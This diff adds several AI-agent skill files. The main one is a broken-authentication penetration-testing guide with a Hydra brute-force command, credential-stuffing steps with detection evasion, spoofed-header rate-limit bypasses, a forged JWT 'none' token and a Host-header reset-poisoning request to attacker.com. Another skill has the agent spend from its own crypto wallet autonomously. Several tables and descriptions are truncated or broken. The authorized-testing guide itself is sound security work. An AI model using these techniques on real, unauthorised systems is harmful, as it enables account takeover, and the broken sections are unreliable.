### ❌ Synchronous Calls in VPC
|
||||
|
||||
**Why bad**: VPC-attached Lambdas have ENI setup overhead.
|
||||
Blocking DNS lookups or connections worsen cold starts.
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Issue | high | ## Measure your INIT phase |
|
||||
| Issue | high | ## Set appropriate timeout |
|
||||
| Issue | high | ## Increase memory allocation |
|
||||
| Issue | medium | ## Verify VPC configuration |
|
||||
| Issue | medium | ## Tell Lambda not to wait for event loop |
|
||||
| Issue | medium | ## For large file uploads |
|
||||
| Issue | high | ## Use different buckets/prefixes |
|
||||
42
skills/azure-functions/SKILL.md
Normal file
42
skills/azure-functions/SKILL.md
Normal file
@@ -0,0 +1,42 @@
|
||||
---
|
||||
name: azure-functions
|
||||
description: "Expert patterns for Azure Functions development including isolated worker model, Durable Functions orchestration, cold start optimization, and production patterns. Covers .NET, Python, and Node.js programming models. Use when: azure function, azure functions, durable functions, azure serverless, function app."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Azure Functions
|
||||
|
||||
## Patterns
|
||||
|
||||
### Isolated Worker Model (.NET)
|
||||
|
||||
Modern .NET execution model with process isolation
|
||||
|
||||
### Node.js v4 Programming Model
|
||||
|
||||
Modern code-centric approach for TypeScript/JavaScript
|
||||
|
||||
### Python v2 Programming Model
|
||||
|
||||
Decorator-based approach for Python functions
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Blocking Async Calls
|
||||
|
||||
### ❌ New HttpClient Per Request
|
||||
|
||||
### ❌ In-Process Model for New Projects
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Issue | high | ## Use async pattern with Durable Functions |
|
||||
| Issue | high | ## Use IHttpClientFactory (Recommended) |
|
||||
| Issue | high | ## Always use async/await |
|
||||
| Issue | medium | ## Configure maximum timeout (Consumption) |
|
||||
| Issue | high | ## Use isolated worker for new projects |
|
||||
| Issue | medium | ## Configure Application Insights properly |
|
||||
| Issue | medium | ## Check extension bundle (most common) |
|
||||
| Issue | medium | ## Add warmup trigger to initialize your code |
|
||||
292
skills/blockrun/SKILL.md
Normal file
292
skills/blockrun/SKILL.md
Normal file
@@ -0,0 +1,292 @@
|
||||
---
|
||||
name: blockrun
|
||||
description: Use when user needs capabilities Claude lacks (image generation, real-time X/Twitter data) or explicitly requests external models ("blockrun", "use grok", "use gpt", "dall-e", "deepseek")
|
||||
allowed-tools: Read, Bash(python:*), Bash(python3:*), Bash(pip:*), Bash(source:*)
|
||||
---
|
||||
|
||||
# BlockRun
|
||||
|
||||
**BlockRun works with Claude Code and Google Antigravity.**
|
||||
|
||||
You can't generate images. You have no real-time X/Twitter access. BlockRun gives you these capabilities.
|
||||
|
||||
## Philosophy
|
||||
|
||||
You have a wallet. When you need a capability you lack, you pay for it autonomously.
|
||||
|
||||
| You Need | You Call | Pricing |
|
||||
|----------|----------|---------|
|
||||
| Image generation | DALL-E | $0.04/image |
|
||||
| Real-time X data | Grok + Live Search | $0.025/source |
|
||||
| Second opinion | GPT-5.2 | $1.75/M input, $14/M output |
|
||||
| Cheaper processing | DeepSeek | $0.14/M input, $0.28/M output |
|
||||
|
||||
**How it works:** BlockRun uses x402 micropayments to route your requests to OpenAI, xAI, Google, and other providers. No API keys needed - your wallet pays per token.
|
||||
|
||||
## Budget Control (Optional)
|
||||
|
||||
If the user specifies a budget (e.g., "use at most $1"), track spending and stop when budget is reached:
|
||||
|
||||
```python
|
||||
from blockrun_llm import setup_agent_wallet
|
||||
|
||||
client = setup_agent_wallet()
|
||||
budget = 1.0 # User's budget
|
||||
|
||||
# Before each call, check if within budget
|
||||
spending = client.get_spending()
|
||||
if spending['total_usd'] >= budget:
|
||||
print(f"Budget reached: ${spending['total_usd']:.4f} spent")
|
||||
# Stop making calls
|
||||
else:
|
||||
response = client.chat("openai/gpt-5.2", "Hello!")
|
||||
|
||||
# At the end, report spending
|
||||
spending = client.get_spending()
|
||||
print(f"💰 Total spent: ${spending['total_usd']:.4f} across {spending['calls']} calls")
|
||||
```
|
||||
|
||||
## When to Use
|
||||
|
||||
| Trigger | Your Action |
|
||||
|---------|-------------|
|
||||
| User explicitly requests ("blockrun second opinion with GPT on...", "use grok to check...", "generate image with dall-e") | Execute via BlockRun |
|
||||
| User needs something you can't do (images, live X data) | Suggest BlockRun, wait for confirmation |
|
||||
| You can handle the task fine | Do it yourself, don't mention BlockRun |
|
||||
|
||||
## Example User Prompts
|
||||
|
||||
Users will say things like:
|
||||
|
||||
| User Says | What You Do |
|
||||
|-----------|-------------|
|
||||
| "blockrun generate an image of a sunset" | Call DALL-E via ImageClient |
|
||||
| "use grok to check what's trending on X" | Call Grok with `search=True` |
|
||||
| "blockrun GPT review this code" | Call GPT-5.2 via LLMClient |
|
||||
| "what's the latest news about AI agents?" | Suggest Grok (you lack real-time data) |
|
||||
| "generate a logo for my startup" | Suggest DALL-E (you can't generate images) |
|
||||
| "blockrun check my balance" | Show wallet balance via `get_balance()` |
|
||||
| "blockrun deepseek summarize this file" | Call DeepSeek for cost savings |
|
||||
|
||||
## Wallet & Balance
|
||||
|
||||
Use `setup_agent_wallet()` to auto-create a wallet and get a client. This shows the QR code and welcome message on first use.
|
||||
|
||||
**Initialize client (always start with this):**
|
||||
```python
|
||||
from blockrun_llm import setup_agent_wallet
|
||||
|
||||
client = setup_agent_wallet() # Auto-creates wallet, shows QR if new
|
||||
```
|
||||
|
||||
**Check balance (when user asks "show balance", "check wallet", etc.):**
|
||||
```python
|
||||
balance = client.get_balance() # On-chain USDC balance
|
||||
print(f"Balance: ${balance:.2f} USDC")
|
||||
print(f"Wallet: {client.get_wallet_address()}")
|
||||
```
|
||||
|
||||
**Show QR code for funding:**
|
||||
```python
|
||||
from blockrun_llm import generate_wallet_qr_ascii, get_wallet_address
|
||||
|
||||
# ASCII QR for terminal display
|
||||
print(generate_wallet_qr_ascii(get_wallet_address()))
|
||||
```
|
||||
|
||||
## SDK Usage
|
||||
|
||||
**Prerequisite:** Install the SDK with `pip install blockrun-llm`
|
||||
|
||||
### Basic Chat
|
||||
```python
|
||||
from blockrun_llm import setup_agent_wallet
|
||||
|
||||
client = setup_agent_wallet() # Auto-creates wallet if needed
|
||||
response = client.chat("openai/gpt-5.2", "What is 2+2?")
|
||||
print(response)
|
||||
|
||||
# Check spending
|
||||
spending = client.get_spending()
|
||||
print(f"Spent ${spending['total_usd']:.4f}")
|
||||
```
|
||||
|
||||
### Real-time X/Twitter Search (xAI Live Search)
|
||||
|
||||
**IMPORTANT:** For real-time X/Twitter data, you MUST enable Live Search with `search=True` or `search_parameters`.
|
||||
|
||||
```python
|
||||
from blockrun_llm import setup_agent_wallet
|
||||
|
||||
client = setup_agent_wallet()
|
||||
|
||||
# Simple: Enable live search with search=True
|
||||
response = client.chat(
|
||||
"xai/grok-3",
|
||||
"What are the latest posts from @blockrunai on X?",
|
||||
search=True # Enables real-time X/Twitter search
|
||||
)
|
||||
print(response)
|
||||
```
|
||||
|
||||
### Advanced X Search with Filters
|
||||
|
||||
```python
|
||||
from blockrun_llm import setup_agent_wallet
|
||||
|
||||
client = setup_agent_wallet()
|
||||
|
||||
response = client.chat(
|
||||
"xai/grok-3",
|
||||
"Analyze @blockrunai's recent content and engagement",
|
||||
search_parameters={
|
||||
"mode": "on",
|
||||
"sources": [
|
||||
{
|
||||
"type": "x",
|
||||
"included_x_handles": ["blockrunai"],
|
||||
"post_favorite_count": 5
|
||||
}
|
||||
],
|
||||
"max_search_results": 20,
|
||||
"return_citations": True
|
||||
}
|
||||
)
|
||||
print(response)
|
||||
```
|
||||
|
||||
### Image Generation
|
||||
```python
|
||||
from blockrun_llm import ImageClient
|
||||
|
||||
client = ImageClient()
|
||||
result = client.generate("A cute cat wearing a space helmet")
|
||||
print(result.data[0].url)
|
||||
```
|
||||
|
||||
## xAI Live Search Reference
|
||||
|
||||
Live Search is xAI's real-time data API. Cost: **$0.025 per source** (default 10 sources = ~$0.26).
|
||||
|
||||
To reduce costs, set `max_search_results` to a lower value:
|
||||
```python
|
||||
# Only use 5 sources (~$0.13)
|
||||
response = client.chat("xai/grok-3", "What's trending?",
|
||||
search_parameters={"mode": "on", "max_search_results": 5})
|
||||
```
|
||||
|
||||
### Search Parameters
|
||||
|
||||
| Parameter | Type | Default | Description |
|
||||
|-----------|------|---------|-------------|
|
||||
| `mode` | string | "auto" | "off", "auto", or "on" |
|
||||
| `sources` | array | web,news,x | Data sources to query |
|
||||
| `return_citations` | bool | true | Include source URLs |
|
||||
| `from_date` | string | - | Start date (YYYY-MM-DD) |
|
||||
| `to_date` | string | - | End date (YYYY-MM-DD) |
|
||||
| `max_search_results` | int | 10 | Max sources to return (customize to control cost) |
|
||||
|
||||
### Source Types
|
||||
|
||||
**X/Twitter Source:**
|
||||
```python
|
||||
{
|
||||
"type": "x",
|
||||
"included_x_handles": ["handle1", "handle2"], # Max 10
|
||||
"excluded_x_handles": ["spam_account"], # Max 10
|
||||
"post_favorite_count": 100, # Min likes threshold
|
||||
"post_view_count": 1000 # Min views threshold
|
||||
}
|
||||
```
|
||||
|
||||
**Web Source:**
|
||||
```python
|
||||
{
|
||||
"type": "web",
|
||||
"country": "US", # ISO alpha-2 code
|
||||
"allowed_websites": ["example.com"], # Max 5
|
||||
"safe_search": True
|
||||
}
|
||||
```
|
||||
|
||||
**News Source:**
|
||||
```python
|
||||
{
|
||||
"type": "news",
|
||||
"country": "US",
|
||||
"excluded_websites": ["tabloid.com"] # Max 5
|
||||
}
|
||||
```
|
||||
|
||||
## Available Models
|
||||
|
||||
| Model | Best For | Pricing |
|
||||
|-------|----------|---------|
|
||||
| `openai/gpt-5.2` | Second opinions, code review, general | $1.75/M in, $14/M out |
|
||||
| `openai/gpt-5-mini` | Cost-optimized reasoning | $0.30/M in, $1.20/M out |
|
||||
| `openai/o4-mini` | Latest efficient reasoning | $1.10/M in, $4.40/M out |
|
||||
| `openai/o3` | Advanced reasoning, complex problems | $10/M in, $40/M out |
|
||||
| `xai/grok-3` | Real-time X/Twitter data | $3/M + $0.025/source |
|
||||
| `deepseek/deepseek-chat` | Simple tasks, bulk processing | $0.14/M in, $0.28/M out |
|
||||
| `google/gemini-2.5-flash` | Very long documents, fast | $0.15/M in, $0.60/M out |
|
||||
| `openai/dall-e-3` | Photorealistic images | $0.04/image |
|
||||
| `google/nano-banana` | Fast, artistic images | $0.01/image |
|
||||
|
||||
*M = million tokens. Actual cost depends on your prompt and response length.*
|
||||
|
||||
## Cost Reference
|
||||
|
||||
All LLM costs are per million tokens (M = 1,000,000 tokens).
|
||||
|
||||
| Model | Input | Output |
|
||||
|-------|-------|--------|
|
||||
| GPT-5.2 | $1.75/M | $14.00/M |
|
||||
| GPT-5-mini | $0.30/M | $1.20/M |
|
||||
| Grok-3 (no search) | $3.00/M | $15.00/M |
|
||||
| DeepSeek | $0.14/M | $0.28/M |
|
||||
|
||||
| Fixed Cost Actions | |
|
||||
|-------|--------|
|
||||
| Grok Live Search | $0.025/source (default 10 = $0.25) |
|
||||
| DALL-E image | $0.04/image |
|
||||
| Nano Banana image | $0.01/image |
|
||||
|
||||
**Typical costs:** A 500-word prompt (~750 tokens) to GPT-5.2 costs ~$0.001 input. A 1000-word response (~1500 tokens) costs ~$0.02 output.
|
||||
|
||||
## Setup & Funding
|
||||
|
||||
**Wallet location:** `$HOME/.blockrun/.session` (e.g., `/Users/username/.blockrun/.session`)
|
||||
|
||||
**First-time setup:**
|
||||
1. Wallet auto-creates when `setup_agent_wallet()` is called
|
||||
2. Check wallet and balance:
|
||||
```python
|
||||
from blockrun_llm import setup_agent_wallet
|
||||
client = setup_agent_wallet()
|
||||
print(f"Wallet: {client.get_wallet_address()}")
|
||||
print(f"Balance: ${client.get_balance():.2f} USDC")
|
||||
```
|
||||
3. Fund wallet with $1-5 USDC on Base network
|
||||
|
||||
**Show QR code for funding (ASCII for terminal):**
|
||||
```python
|
||||
from blockrun_llm import generate_wallet_qr_ascii, get_wallet_address
|
||||
print(generate_wallet_qr_ascii(get_wallet_address()))
|
||||
```
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
**"Grok says it has no real-time access"**
|
||||
→ You forgot to enable Live Search. Add `search=True`:
|
||||
```python
|
||||
response = client.chat("xai/grok-3", "What's trending?", search=True)
|
||||
```
|
||||
|
||||
**Module not found**
|
||||
→ Install the SDK: `pip install blockrun-llm`
|
||||
|
||||
## Updates
|
||||
|
||||
```bash
|
||||
pip install --upgrade blockrun-llm
|
||||
```
|
||||
473
skills/broken-authentication/SKILL.md
Normal file
473
skills/broken-authentication/SKILL.md
Normal file
@@ -0,0 +1,473 @@
|
||||
---
|
||||
name: Broken Authentication Testing
|
||||
description: This skill should be used when the user asks to "test for broken authentication vulnerabilities", "assess session management security", "perform credential stuffing tests", "evaluate password policies", "test for session fixation", or "identify authentication bypass flaws". It provides comprehensive techniques for identifying authentication and session management weaknesses in web applications.
|
||||
---
|
||||
|
||||
# Broken Authentication Testing
|
||||
|
||||
## Purpose
|
||||
|
||||
Identify and exploit authentication and session management vulnerabilities in web applications. Broken authentication consistently ranks in the OWASP Top 10 and can lead to account takeover, identity theft, and unauthorized access to sensitive systems. This skill covers testing methodologies for password policies, session handling, multi-factor authentication, and credential management.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
### Required Knowledge
|
||||
- HTTP protocol and session mechanisms
|
||||
- Authentication types (SFA, 2FA, MFA)
|
||||
- Cookie and token handling
|
||||
- Common authentication frameworks
|
||||
|
||||
### Required Tools
|
||||
- Burp Suite Professional or Community
|
||||
- Hydra or similar brute-force tools
|
||||
- Custom wordlists for credential testing
|
||||
- Browser developer tools
|
||||
|
||||
### Required Access
|
||||
- Target application URL
|
||||
- Test account credentials
|
||||
- Written authorization for testing
|
||||
|
||||
## Outputs and Deliverables
|
||||
|
||||
1. **Authentication Assessment Report** - Document all identified vulnerabilities
|
||||
2. **Credential Testing Results** - Brute-force and dictionary attack outcomes
|
||||
3. **Session Security Analysis** - Token randomness and timeout evaluation
|
||||
4. **Remediation Recommendations** - Security hardening guidance
|
||||
|
||||
## Core Workflow
|
||||
|
||||
### Phase 1: Authentication Mechanism Analysis
|
||||
|
||||
Understand the application's authentication architecture:
|
||||
|
||||
```
|
||||
# Identify authentication type
|
||||
- Password-based (forms, basic auth, digest)
|
||||
- Token-based (JWT, OAuth, API keys)
|
||||
- Certificate-based (mutual TLS)
|
||||
- Multi-factor (SMS, TOTP, hardware tokens)
|
||||
|
||||
# Map authentication endpoints
|
||||
/login, /signin, /authenticate
|
||||
/register, /signup
|
||||
/forgot-password, /reset-password
|
||||
/logout, /signout
|
||||
/api/auth/*, /oauth/*
|
||||
```
|
||||
|
||||
Capture and analyze authentication requests:
|
||||
|
||||
```http
|
||||
POST /login HTTP/1.1
|
||||
Host: target.com
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
username=test&password=test123
|
||||
```
|
||||
|
||||
### Phase 2: Password Policy Testing
|
||||
|
||||
Evaluate password requirements and enforcement:
|
||||
|
||||
```bash
|
||||
# Test minimum length (a, ab, abcdefgh)
|
||||
# Test complexity (password, password1, Password1!)
|
||||
# Test common weak passwords (123456, password, qwerty, admin)
|
||||
# Test username as password (admin/admin, test/test)
|
||||
```
|
||||
|
||||
Document policy gaps: Minimum length <8, no complexity, common passwords allowed, username as password.
|
||||
|
||||
### Phase 3: Credential Enumeration
|
||||
|
||||
Test for username enumeration vulnerabilities:
|
||||
|
||||
```bash
|
||||
# Compare responses for valid vs invalid usernames
|
||||
# Invalid: "Invalid username" vs Valid: "Invalid password"
|
||||
# Check timing differences, response codes, registration messages
|
||||
```
|
||||
|
||||
# Password reset
|
||||
"Email sent if account exists" (secure)
|
||||
"No account with that email" (leaks info)
|
||||
|
||||
# API responses
|
||||
{"error": "user_not_found"}
|
||||
{"error": "invalid_password"}
|
||||
```
|
||||
|
||||
### Phase 4: Brute Force Testing
|
||||
|
||||
Test account lockout and rate limiting:
|
||||
|
||||
```bash
|
||||
# Using Hydra for form-based auth
|
||||
hydra -l admin -P /usr/share/wordlists/rockyou.txt \
|
||||
target.com http-post-form \
|
||||
"/login:username=^USER^&password=^PASS^:Invalid credentials"
|
||||
|
||||
# Using Burp Intruder
|
||||
1. Capture login request
|
||||
2. Send to Intruder
|
||||
3. Set payload positions on password field
|
||||
4. Load wordlist
|
||||
5. Start attack
|
||||
6. Analyze response lengths/codes
|
||||
```
|
||||
|
||||
Check for protections:
|
||||
|
||||
```bash
|
||||
# Account lockout
|
||||
- After how many attempts?
|
||||
- Duration of lockout?
|
||||
- Lockout notification?
|
||||
|
||||
# Rate limiting
|
||||
- Requests per minute limit?
|
||||
- IP-based or account-based?
|
||||
- Bypass via headers (X-Forwarded-For)?
|
||||
|
||||
# CAPTCHA
|
||||
- After failed attempts?
|
||||
- Easily bypassable?
|
||||
```
|
||||
|
||||
### Phase 5: Credential Stuffing
|
||||
|
||||
Test with known breached credentials:
|
||||
|
||||
```bash
|
||||
# Credential stuffing differs from brute force
|
||||
# Uses known email:password pairs from breaches
|
||||
|
||||
# Using Burp Intruder with Pitchfork attack
|
||||
1. Set username and password as positions
|
||||
2. Load email list as payload 1
|
||||
3. Load password list as payload 2 (matched pairs)
|
||||
4. Analyze for successful logins
|
||||
|
||||
# Detection evasion
|
||||
- Slow request rate
|
||||
- Rotate source IPs
|
||||
- Randomize user agents
|
||||
- Add delays between attempts
|
||||
```
|
||||
|
||||
### Phase 6: Session Management Testing
|
||||
|
||||
Analyze session token security:
|
||||
|
||||
```bash
|
||||
# Capture session cookie
|
||||
Cookie: SESSIONID=abc123def456
|
||||
|
||||
# Test token characteristics
|
||||
1. Entropy - Is it random enough?
|
||||
2. Length - Sufficient length (128+ bits)?
|
||||
3. Predictability - Sequential patterns?
|
||||
4. Secure flags - HttpOnly, Secure, SameSite?
|
||||
```
|
||||
|
||||
Session token analysis:
|
||||
|
||||
```python
|
||||
#!/usr/bin/env python3
|
||||
import requests
|
||||
import hashlib
|
||||
|
||||
# Collect multiple session tokens
|
||||
tokens = []
|
||||
for i in range(100):
|
||||
response = requests.get("https://target.com/login")
|
||||
token = response.cookies.get("SESSIONID")
|
||||
tokens.append(token)
|
||||
|
||||
# Analyze for patterns
|
||||
# Check for sequential increments
|
||||
# Calculate entropy
|
||||
# Look for timestamp components
|
||||
```
|
||||
|
||||
### Phase 7: Session Fixation Testing
|
||||
|
||||
Test if session is regenerated after authentication:
|
||||
|
||||
```bash
|
||||
# Step 1: Get session before login
|
||||
GET /login HTTP/1.1
|
||||
Response: Set-Cookie: SESSIONID=abc123
|
||||
|
||||
# Step 2: Login with same session
|
||||
POST /login HTTP/1.1
|
||||
Cookie: SESSIONID=abc123
|
||||
username=valid&password=valid
|
||||
|
||||
# Step 3: Check if session changed
|
||||
# VULNERABLE if SESSIONID remains abc123
|
||||
# SECURE if new session assigned after login
|
||||
```
|
||||
|
||||
Attack scenario:
|
||||
|
||||
```bash
|
||||
# Attacker workflow:
|
||||
1. Attacker visits site, gets session: SESSIONID=attacker_session
|
||||
2. Attacker sends link to victim with fixed session:
|
||||
https://target.com/login?SESSIONID=attacker_session
|
||||
3. Victim logs in with attacker's session
|
||||
4. Attacker now has authenticated session
|
||||
```
|
||||
|
||||
### Phase 8: Session Timeout Testing
|
||||
|
||||
Verify session expiration policies:
|
||||
|
||||
```bash
|
||||
# Test idle timeout
|
||||
1. Login and note session cookie
|
||||
2. Wait without activity (15, 30, 60 minutes)
|
||||
3. Attempt to use session
|
||||
4. Check if session is still valid
|
||||
|
||||
# Test absolute timeout
|
||||
1. Login and continuously use session
|
||||
2. Check if forced logout after set period (8 hours, 24 hours)
|
||||
|
||||
# Test logout functionality
|
||||
1. Login and note session
|
||||
2. Click logout
|
||||
3. Attempt to reuse old session cookie
|
||||
4. Session should be invalidated server-side
|
||||
```
|
||||
|
||||
### Phase 9: Multi-Factor Authentication Testing
|
||||
|
||||
Assess MFA implementation security:
|
||||
|
||||
```bash
|
||||
# OTP brute force
|
||||
- 4-digit OTP = 10,000 combinations
|
||||
- 6-digit OTP = 1,000,000 combinations
|
||||
- Test rate limiting on OTP endpoint
|
||||
|
||||
# OTP bypass techniques
|
||||
- Skip MFA step by direct URL access
|
||||
- Modify response to indicate MFA passed
|
||||
- Null/empty OTP submission
|
||||
- Previous valid OTP reuse
|
||||
|
||||
# API Version Downgrade Attack (crAPI example)
|
||||
# If /api/v3/check-otp has rate limiting, try older versions:
|
||||
POST /api/v2/check-otp
|
||||
{"otp": "1234"}
|
||||
# Older API versions may lack security controls
|
||||
|
||||
# Using Burp for OTP testing
|
||||
1. Capture OTP verification request
|
||||
2. Send to Intruder
|
||||
3. Set OTP field as payload position
|
||||
4. Use numbers payload (0000-9999)
|
||||
5. Check for successful bypass
|
||||
```
|
||||
|
||||
Test MFA enrollment:
|
||||
|
||||
```bash
|
||||
# Forced enrollment
|
||||
- Can MFA be skipped during setup?
|
||||
- Can backup codes be accessed without verification?
|
||||
|
||||
# Recovery process
|
||||
- Can MFA be disabled via email alone?
|
||||
- Social engineering potential?
|
||||
```
|
||||
|
||||
### Phase 10: Password Reset Testing
|
||||
|
||||
Analyze password reset security:
|
||||
|
||||
```bash
|
||||
# Token security
|
||||
1. Request password reset
|
||||
2. Capture reset link
|
||||
3. Analyze token:
|
||||
- Length and randomness
|
||||
- Expiration time
|
||||
- Single-use enforcement
|
||||
- Account binding
|
||||
|
||||
# Token manipulation
|
||||
https://target.com/reset?token=abc123&user=victim
|
||||
# Try changing user parameter while using valid token
|
||||
|
||||
# Host header injection
|
||||
POST /forgot-password HTTP/1.1
|
||||
Host: attacker.com
|
||||
email=victim@email.com
|
||||
# Reset email may contain attacker's domain
|
||||
```
|
||||
|
||||
## Quick Reference
|
||||
|
||||
### Common Vulnerability Types
|
||||
|
||||
| Vulnerability | Risk | Test Method |
|
||||
|--------------|------|-------------|
|
||||
| Weak passwords | High | Policy testing, dictionary attack |
|
||||
| No lockout | High | Brute force testing |
|
||||
| Username enumeration | Medium | Differential response analysis |
|
||||
| Session fixation | High | Pre/post-login session comparison |
|
||||
| Weak session tokens | High | Entropy analysis |
|
||||
| No session timeout | Medium | Long-duration session testing |
|
||||
| Insecure password reset | High | Token analysis, workflow bypass |
|
||||
| MFA bypass | Critical | Direct access, response manipulation |
|
||||
|
||||
### Credential Testing Payloads
|
||||
|
||||
```bash
|
||||
# Default credentials
|
||||
admin:admin
|
||||
admin:password
|
||||
admin:123456
|
||||
root:root
|
||||
test:test
|
||||
user:user
|
||||
|
||||
# Common passwords
|
||||
123456
|
||||
password
|
||||
12345678
|
||||
qwerty
|
||||
abc123
|
||||
password1
|
||||
admin123
|
||||
|
||||
# Breached credential databases
|
||||
- Have I Been Pwned dataset
|
||||
- SecLists passwords
|
||||
- Custom targeted lists
|
||||
```
|
||||
|
||||
### Session Cookie Flags
|
||||
|
||||
| Flag | Purpose | Vulnerability if Missing |
|
||||
|------|---------|------------------------|
|
||||
| HttpOnly | Prevent JS access | XSS can steal session |
|
||||
| Secure | HTTPS only | Sent over HTTP |
|
||||
| SameSite | CSRF protection | Cross-site requests allowed |
|
||||
| Path | URL scope | Broader exposure |
|
||||
| Domain | Domain scope | Subdomain access |
|
||||
| Expires | Lifetime | Persistent sessions |
|
||||
|
||||
### Rate Limiting Bypass Headers
|
||||
|
||||
```http
|
||||
X-Forwarded-For: 127.0.0.1
|
||||
X-Real-IP: 127.0.0.1
|
||||
X-Originating-IP: 127.0.0.1
|
||||
X-Client-IP: 127.0.0.1
|
||||
X-Remote-IP: 127.0.0.1
|
||||
True-Client-IP: 127.0.0.1
|
||||
```
|
||||
|
||||
## Constraints and Limitations
|
||||
|
||||
### Legal Requirements
|
||||
- Only test with explicit written authorization
|
||||
- Avoid testing with real breached credentials
|
||||
- Do not access actual user accounts
|
||||
- Document all testing activities
|
||||
|
||||
### Technical Limitations
|
||||
- CAPTCHA may prevent automated testing
|
||||
- Rate limiting affects brute force timing
|
||||
- MFA significantly increases attack difficulty
|
||||
- Some vulnerabilities require victim interaction
|
||||
|
||||
### Scope Considerations
|
||||
- Test accounts may behave differently than production
|
||||
- Some features may be disabled in test environments
|
||||
- Third-party authentication may be out of scope
|
||||
- Production testing requires extra caution
|
||||
|
||||
## Examples
|
||||
|
||||
### Example 1: Account Lockout Bypass
|
||||
|
||||
**Scenario:** Test if account lockout can be bypassed
|
||||
|
||||
```bash
|
||||
# Step 1: Identify lockout threshold
|
||||
# Try 5 wrong passwords for admin account
|
||||
# Result: "Account locked for 30 minutes"
|
||||
|
||||
# Step 2: Test bypass via IP rotation
|
||||
# Use X-Forwarded-For header
|
||||
POST /login HTTP/1.1
|
||||
X-Forwarded-For: 192.168.1.1
|
||||
username=admin&password=attempt1
|
||||
|
||||
# Increment IP for each attempt
|
||||
X-Forwarded-For: 192.168.1.2
|
||||
# Continue until successful or confirmed blocked
|
||||
|
||||
# Step 3: Test bypass via case manipulation
|
||||
username=Admin (vs admin)
|
||||
username=ADMIN
|
||||
# Some systems treat these as different accounts
|
||||
```
|
||||
|
||||
### Example 2: JWT Token Attack
|
||||
|
||||
**Scenario:** Exploit weak JWT implementation
|
||||
|
||||
```bash
|
||||
# Step 1: Capture JWT token
|
||||
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdCJ9.signature
|
||||
|
||||
# Step 2: Decode and analyze
|
||||
# Header: {"alg":"HS256","typ":"JWT"}
|
||||
# Payload: {"user":"test","role":"user"}
|
||||
|
||||
# Step 3: Try "none" algorithm attack
|
||||
# Change header to: {"alg":"none","typ":"JWT"}
|
||||
# Remove signature
|
||||
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4iLCJyb2xlIjoiYWRtaW4ifQ.
|
||||
|
||||
# Step 4: Submit modified token
|
||||
Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
|
||||
```
|
||||
|
||||
### Example 3: Password Reset Token Exploitation
|
||||
|
||||
**Scenario:** Test password reset functionality
|
||||
|
||||
```bash
|
||||
# Step 1: Request reset for test account
|
||||
POST /forgot-password
|
||||
email=test@example.com
|
||||
|
||||
# Step 2: Capture reset link
|
||||
https://target.com/reset?token=a1b2c3d4e5f6
|
||||
|
||||
# Step 3: Test token properties
|
||||
# Reuse: Try using same token twice
|
||||
# Expiration: Wait 24+ hours and retry
|
||||
# Modification: Change characters in token
|
||||
|
||||
# Step 4: Test for user parameter manipulation
|
||||
https://target.com/reset?token=a1b2c3d4e5f6&email=admin@example.com
|
||||
# Check if admin's password can be reset with test user's token
|
||||
```
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
| Issue | Solutions |
|
||||
|-------|-----------|
|
||||
| Brute force too slow | Identify rate limit scope; IP rotation; add delays; use targeted wordlists |
|
||||
| Session analysis inconclusive | Collect 1000+ tokens; use statistical tools; check for timestamps; compare accounts |
|
||||
| MFA cannot be bypassed | Document as secure; test backup/recovery mechanisms; check MFA fatigue; verify enrollment |
|
||||
| Account lockout prevents testing | Request multiple test accounts; test threshold first; use slower timing |
|
||||
70
skills/browser-automation/SKILL.md
Normal file
70
skills/browser-automation/SKILL.md
Normal file
@@ -0,0 +1,70 @@
|
||||
---
|
||||
name: browser-automation
|
||||
description: "Browser automation powers web testing, scraping, and AI agent interactions. The difference between a flaky script and a reliable system comes down to understanding selectors, waiting strategies, and anti-detection patterns. This skill covers Playwright (recommended) and Puppeteer, with patterns for testing, scraping, and agentic browser control. Key insight: Playwright won the framework war. Unless you need Puppeteer's stealth ecosystem or are Chrome-only, Playwright is the better choice in 202"
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Browser Automation
|
||||
|
||||
You are a browser automation expert who has debugged thousands of flaky tests
|
||||
and built scrapers that run for years without breaking. You've seen the
|
||||
evolution from Selenium to Puppeteer to Playwright and understand exactly
|
||||
when each tool shines.
|
||||
|
||||
Your core insight: Most automation failures come from three sources - bad
|
||||
selectors, missing waits, and detection systems. You teach people to think
|
||||
like the browser, use the right selectors, and let Playwright's auto-wait
|
||||
do its job.
|
||||
|
||||
For scraping, yo
|
||||
|
||||
## Capabilities
|
||||
|
||||
- browser-automation
|
||||
- playwright
|
||||
- puppeteer
|
||||
- headless-browsers
|
||||
- web-scraping
|
||||
- browser-testing
|
||||
- e2e-testing
|
||||
- ui-automation
|
||||
- selenium-alternatives
|
||||
|
||||
## Patterns
|
||||
|
||||
### Test Isolation Pattern
|
||||
|
||||
Each test runs in complete isolation with fresh state
|
||||
|
||||
### User-Facing Locator Pattern
|
||||
|
||||
Select elements the way users see them
|
||||
|
||||
### Auto-Wait Pattern
|
||||
|
||||
Let Playwright wait automatically, never add manual waits
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Arbitrary Timeouts
|
||||
|
||||
### ❌ CSS/XPath First
|
||||
|
||||
### ❌ Single Browser Context for Everything
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Issue | critical | # REMOVE all waitForTimeout calls |
|
||||
| Issue | high | # Use user-facing locators instead: |
|
||||
| Issue | high | # Use stealth plugins: |
|
||||
| Issue | high | # Each test must be fully isolated: |
|
||||
| Issue | medium | # Enable traces for failures: |
|
||||
| Issue | medium | # Set consistent viewport: |
|
||||
| Issue | high | # Add delays between requests: |
|
||||
